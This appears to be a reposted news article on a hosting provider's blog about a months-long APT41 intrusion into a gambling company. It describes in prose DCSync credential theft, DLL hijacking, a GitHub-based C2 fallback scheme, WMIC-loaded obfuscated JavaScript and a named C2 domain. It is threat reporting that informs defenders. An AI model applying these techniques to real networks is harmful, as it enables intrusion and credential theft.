Contact Info

Atlas Cloud LLC 600 Cleveland Street Suite 348 Clearwater, FL 33755 USA

support@dedirock.com

Client Area
Recommended Services
Supported Scripts
WordPress
Hubspot
Joomla
Drupal
Wix
Shopify
Magento
Typeo3

The highly active Chinese state-sponsored group known as APT41, also referred to as Brass Typhoon or Wicked Panda, has been linked to a complex cyber operation that specifically targets the gambling and gaming sectors.

According to Ido Naor, CEO and co-founder of the cybersecurity firm Security Joes, the attackers managed to stealthily collect critical data from the targeted organization over a span of six months, including network setups, user credentials, and information from the LSASS process. This information was noted in a statement given to The Hacker News.

Naor indicated that during the breach, the intruders consistently refined their tools in response to the actions taken by the security team, monitoring the defenders to modify their techniques to avoid detection and retain ongoing access to the infiltrated network.

This multi-faceted assault, which focused on one client and extended nearly nine months, shows similarities with a different set of intrusions identified by Sophos under the title Operation Crimson Palace.

Naor reported that Security Joes began tackling the problem four months ago and emphasized that such attacks are typically influenced by decisions made by state actors. He expressed a strong belief that APT41 had aimed for financial gain in this instance.

The operation has been crafted with a focus on stealth, employing a variety of techniques to meet its objectives. The attackers used a custom arsenal designed not only to bypass existing security measures but also to collect critical data and create hidden pathways for prolonged remote access.

Security Joes characterized APT41 as being “highly skilled and systematic,” noting their capability to conduct espionage missions as well as disrupt the supply chain, which results in theft of intellectual property and financially motivated attacks like ransomware and cryptocurrency mining.

While the precise means of initial access exploited in this attack remains unclear, there are indications that spear-phishing emails may have been the avenue, especially given the lack of active weaknesses in the public-facing web applications.

Upon breaching the target’s system, the attackers executed a DCSync attack to harvest password hashes associated with service and admin accounts, thereby increasing their access levels. With these credentials, they established persistent control over the network, with particular emphasis on administrative and developer accounts.

The intruders reportedly conducted reconnaissance and post-exploitation tasks methodically, often adjusting their tools based on the defensive measures applied against them. Their ultimate aim was to download and execute additional malicious payloads.

Several techniques utilized to achieve their goals included Phantom DLL Hijacking and the use of legitimate tools such as wmic.exe, alongside taking advantage of their access to service accounts with elevated privileges to trigger malicious execution.

The next phase involved a hazardous DLL file called TSVIPSrv.dll, which was acquired through the SMB protocol. Following this, the payload initiated contact with a pre-defined command-and-control (C2) server.

In cases where the predetermined C2 server became unreachable, the malware sought to update its C2 details by extracting user data from GitHub via specific queries.

This malware could parse the HTML returned from these GitHub searches, targeting sequences of capitalized words. It gathered a total of eight words, then focused on extracting only the uppercase letters between A and P. This process produces an 8-character string that corresponds to the new C2 server’s IP address for ongoing operations.

Engagement with the C2 server allows for detailed profiling of the compromised machine and facilitates the download of further malware through socket connections.

Security Joes observed that the threat actors ceased operations for several weeks after their activities came to light but eventually adapted their strategy to deploy heavily obfuscated JavaScript code embedded within a modified XSL file.

This attack strategy employed the WMIC command to indirectly load the XSL file, leading to the execution of the malicious JavaScript code introduced by the attackers.

This JavaScript acted as a downloader, utilizing the domain time.qnapntp.com as a C2 server to acquire subsequent malware designed to collect system fingerprint data and transmit that information back to the server, filtered to focus on only those systems of interest to the attackers.

Notably, the code specifically targets systems with IP addresses containing the substring ‘10.20.22,’ demonstrating the attacker’s intent to identify valuable assets within specific subnets. By correlating this data with network logs and the affected device IP addresses, it became evident that the attackers used this filtering to exclusively target devices within the VPN subnet.

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.


Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.

Share this Post
0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x